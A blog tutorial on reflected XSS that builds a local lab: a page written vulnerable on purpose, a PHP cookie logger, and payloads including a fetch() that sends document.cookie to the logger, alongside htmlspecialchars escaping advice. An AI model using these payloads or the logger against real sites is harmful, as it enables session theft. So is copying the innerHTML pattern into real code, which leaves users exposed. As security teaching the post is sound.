Post

Reflected XSS: Explained with Real Examples

Posted
Preview Image
By saramazal
2 min read
Reflected XSS: Explained with Real Examples

πŸ‘Ύ Reflected XSS – Real-World Lab

Let’s dive into Reflected Cross-Site Scripting (XSS), a client-side vulnerability used by attackers to execute malicious code in a victim’s browser. This lab simulates real scenarios, built for hands-on learning.

🚨 What is Reflected XSS?

Reflected XSS happens when data from a request (URL, form, etc.) is immediately echoed in the response without validation or sanitization.

πŸ› οΈ Example:

1

http://victim-site.com/page?q=<script>alert(1)</script>

If the app outputs q without filtering, the script runs in the browser.

🎯 Lab Goals

  • See how user input reflects in HTML
  • Inject XSS payloads manually
  • Steal cookies with fetch() to a PHP logger
  • Confirm captured cookies in terminal

🧱 Lab Structure

1
2
3
4
5

xss-lab/
β”œβ”€β”€ xss-lab.html        # The vulnerable page
β”œβ”€β”€ steal.php           # Attacker's logger
β”œβ”€β”€ requests.log        # Log of stolen cookies
β”œβ”€β”€ cookie.txt          # Simulated browser cookie file

🧠 Lab Code

xss-lab.html

1
2
3
4
5
6
7
8
9
10
11
12
13

<!DOCTYPE html>
<html>
<head><title>XSS Lab</title></head>
<body>
  <h2>Reflected XSS Demo</h2>
  <div id="output"></div>

  <script>
    const q = new URLSearchParams(location.search).get('q');
    document.getElementById('output').innerHTML = q;
  </script>
</body>
</html>

steal.php

1
2
3

<?php
file_put_contents("requests.log", print_r($_GET, true) . "\n", FILE_APPEND);
?>

πŸš€ Run the Lab Locally

  1. Start a local PHP server: 
    1

    php -S localhost:8080
  2. Set a fake cookie in your browser (DevTools Console): 
    1

    document.cookie = "session_id=hello_mazal";
  3. Trigger the attack: 
    1

    http://localhost:8080/xss-lab.html?q=<script>fetch('http://localhost:8080/steal.php?c='+document.cookie)</script>
  4. Check logs: 
    1

    cat requests.log

πŸ’‘ Test Inputs to Play With

Add these for form-based XSS:

1
2
3

<input type="text" placeholder="Search...">
<textarea placeholder="Write a comment..."></textarea>
<input type="file" accept="image/*">

βš”οΈ Payload Examples

  • Classic alert box: 
    1

    <script>alert("XSS")</script>
  • Cookie theft: 
    1

    <script>fetch('http://localhost:8080/steal.php?c=' + document.cookie)</script>
  • Image-based execution: 
    1

    <img src=x onerror="alert('XSS')">
  • On-hover trigger: 
    1

    <b onmouseover="alert('XSS')">Hover me</b>
  • Script via eval (dangerous if used): 
    1

    "><script>eval('alert(1)')</script>

πŸ§ͺ Testing Tips

βœ… Test in the browser by entering payloads in the URL:
http://localhost:8080/xss-lab.html?q=<script>alert(1)</script>

βœ… Or manually trigger fetch from DevTools:

1

fetch("http://localhost:8080/steal.php?c=" + document.cookie)

πŸ”’ Validating & Sanitizing Inputs

  • Validate input against expected patterns (e.g., regex for email)
  • Sanitize output by escaping characters like <, >, ", '

Example (PHP):

1

echo htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');

πŸ”š Final Thoughts

Reflected XSS is fast and dangerous. In real-world bug bounties, it’s still common due to poor input handling.

βœ… Always sanitize before rendering
βœ… Test every input and reflected output
βœ… Use browser DevTools and manual payloads for testing

Stay curious, break safely, and document everything.
~ Maz4l 🀺

More hacks, more notes, more wins.

XSS
xss web pentesting tryhackme client-side appsec
This post is licensed under CC BY 4.0 by the author.